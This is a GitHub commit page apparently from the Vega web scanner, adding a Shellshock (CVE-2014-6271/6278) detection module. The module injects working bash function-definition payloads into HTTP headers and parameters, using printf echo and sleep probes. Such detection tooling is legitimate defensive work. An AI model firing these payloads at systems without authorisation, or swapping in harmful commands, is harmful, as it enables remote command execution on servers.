Skip to content

Commit

Permalink
Merge branch 'develop' of https://github.com/tdzmont/Vega into develop
Browse files Browse the repository at this point in the history 
Conflicts:
	scripts/scanner/modules/injection/bash-inject.js
  • Loading branch information
@dma
dma committed Oct 14, 2014
2 parents 30dbd7e + 275c2ca commit e786a9b
Show file tree
Hide file tree
Showing 2 changed files with 170 additions and 0 deletions.
169 changes: 169 additions & 0 deletions scripts/scanner/modules/injection/bash-inject.js
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,169 @@
var module = {
name: "Bash Environment Variable Blind OS Injection (CVE-2014-6271, CVE-2014-6278) Checks",
category: "Injection Modules",
differential: true
};

var alteredRequests = [];

var sleepPayload = "() { :;}; /bin/sleep 31";
var payload6271 = "() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'";
var payload6278 = "() { _; } >_[\$(\$())] { printf 'Content-Type: text/html\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'; }";

alteredRequests.push({
payload: payload6271,
header: "EchoAttackFirst",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "Referer",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "Accept-Language",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "Cookie",
check: "echo"
});

alteredRequests.push({
payload: payload6278,
header: "User-Agent",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "Referer",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "Accept-Language",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "Cookie",
check: "echo"
});


alteredRequests.push({
payload: sleepPayload,
header: "",
check: "timeout"
});
alteredRequests.push({
payload: sleepPayload,
header: "User-Agent",
check: "timeout"
});
alteredRequests.push({
payload: sleepPayload,
header: "Referer",
check: "timeout"
});
alteredRequests.push({
payload: sleepPayload,
header: "Accept-Language",
check: "timeout"
});
alteredRequests.push({
payload: sleepPayload,
header: "Cookie",
check: "timeout"
});

function initialize(ctx) {
var ps = ctx.getPathState();
var req = ps.createAlteredRequest("", true);
req.addHeader("User-Agent","() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'");
ctx.submitRequest(req, process, 0);

}

var checkTiming = function(ctx, currentIndex) {
if (ctx.getSavedResponse(currentIndex).milliseconds > 30000) {
return true;
}
return false;
};


var checkOutput = function(ctx, currentIndex) {
if (ctx.getSavedResponse(currentIndex).bodyAsString.indexOf("VEGA123 vulnerable VEGA123") > -1) {
return true;
}
return false;
};

function process(req, res, ctx) {
if (ctx.hasModuleFailed()) return;
if (res.fetchFail) {
ctx.error(req, res, "During Bash Environment Variable injection checks");
ctx.setModuleFailed();
return;
}
var ps = ctx.getPathState();

var currentIndex = ctx.getCurrentIndex();
ctx.addRequestResponse(req, res);
ctx.incrementResponseCount();

var type="";
if (alteredRequests[currentIndex].check == "echo"){
var detected = checkOutput(ctx, currentIndex); /* check for echod output first */
type = detected ? "Executed Commands on Host" : "";
}
else{
detected = checkTiming(ctx, currentIndex); /* check for timing attack */
type = detected ? "Blind Timing Analysis Checks" : "";
}
if (detected){
var uri = String(req.requestLine.uri);
var uripart = uri.replace(/\?.*/, "");
if ((uripart.length > 2) && (uripart.slice(-1) == "/")) {
uripart = uripart.substring(0, uripart.length-1);
}

ctx.alert("vinfo-bash-inject", ctx.getSavedRequest(currentIndex), ctx.getSavedResponse(currentIndex), {
output: res.bodyAsString,
key: "vinfo-shell-inject:" + uripart + ":" + ps.getFuzzableParameter().name,
resource: uripart,
detectiontype: type,
param: ps.getFuzzableParameter().name
});
} else {
if (currentIndex + 1 < alteredRequests.length) {
if (alteredRequests[currentIndex + 1].header == "") {
req = ps.createRequest();
req = ps.createAlteredRequest(alteredRequests[currentIndex + 1].payload, false);
} else {
req = ps.createRequest();
req.addHeader(alteredRequests[currentIndex + 1].header, alteredRequests[currentIndex + 1].payload);
}
ctx.submitRequest(req, process, currentIndex + 1);
var submitted=currentIndex+1;
}
}

if (ctx.allResponsesReceived()) {
ps.decrementFuzzCounter();
}
}

1 change: 1 addition & 0 deletions xml/alerts/vinfo-bash-inject.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@
<references>
<url address="https://access.redhat.com/articles/1200223">Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271, CVE-2014-7169) (Red Hat)</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271">CVE-2014-6271</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278">CVE-2014-6278</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169">CVE-2014-7169</url>
<url address="https://www.owasp.org/index.php/Command_Injection">Command Injection (OWASP)</url>
<url address="https://www.owasp.org/index.php/Reviewing_Code_for_OS_Injection">Reviewing Code for OS Injection (OWASP)</url>
Expand Down

0 comments on commit e786a9b

Please sign in to comment.